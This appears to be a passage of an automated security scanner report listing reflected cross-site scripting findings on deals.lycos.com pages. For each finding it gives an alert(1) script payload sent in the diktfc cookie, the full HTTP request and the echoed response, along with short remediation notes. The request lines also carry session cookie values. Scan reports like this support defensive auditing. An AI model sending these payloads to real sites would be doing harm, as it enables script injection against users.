P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.234. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46acf"%3balert(1)//6a7aece2843 was submitted in the diktfc cookie. This input was echoed as 46acf";alert(1)//6a7aece2843 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf"%3balert(1)//6a7aece2843; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf";alert(1)//6a7aece2843"
});
</script>
...[SNIP]...

1.235. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-sunburst-a697-cell-phone-50-414188

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4046a"><script>alert(1)</script>6e957a235e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.236. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-sunburst-a697-cell-phone-50-414188

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f2f"%3balert(1)//00ef4809ce3 was submitted in the diktfc cookie. This input was echoed as c8f2f";alert(1)//00ef4809ce3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f"%3balert(1)//00ef4809ce3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f";alert(1)//00ef4809ce3"
});
</script>
...[SNIP]...

1.237. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20a9f"><script>alert(1)</script>2045b97a5bb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb&amp;cj=1" alt="tracker" />
...[SNIP]...

1.238. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84305"%3balert(1)//a3738040bfc was submitted in the diktfc cookie. This input was echoed as 84305";alert(1)//a3738040bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A84305"%3balert(1)//a3738040bfc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A84305";alert(1)//a3738040bfc"
});
</script>
...[SNIP]...

1.239. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8753a"><script>alert(1)</script>f676558b74c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.240. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fe7f"%3balert(1)//d72ebf3820a was submitted in the diktfc cookie. This input was echoed as 1fe7f";alert(1)//d72ebf3820a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fe7f"%3balert(1)//d72ebf3820a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fe7f";alert(1)//d72ebf3820a"
});
</script>
...[SNIP]...

1.241. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298cd"%3balert(1)//2c40b7b6bb2 was submitted in the diktfc cookie. This input was echoed as 298cd";alert(1)//2c40b7b6bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298cd"%3balert(1)//2c40b7b6bb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
avascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298cd";alert(1)//2c40b7b6bb2"
});
</script>
...[SNIP]...

1.242. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b34d0"><script>alert(1)</script>e18b336f5a9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
c="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9&amp;cj=1" alt="tracker" />
...[SNIP]...

1.243. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sony-14mp-nex-5-dslr-w-lens-654-413823

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46fb"%3balert(1)//caa31ca79e7 was submitted in the diktfc cookie. This input was echoed as b46fb";alert(1)//caa31ca79e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab46fb"%3balert(1)//caa31ca79e7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:25 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab46fb";alert(1)//caa31ca79e7"
});
</script>
...[SNIP]...

1.244. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sony-14mp-nex-5-dslr-w-lens-654-413823

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc337"><script>alert(1)</script>e5f7290f0d7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

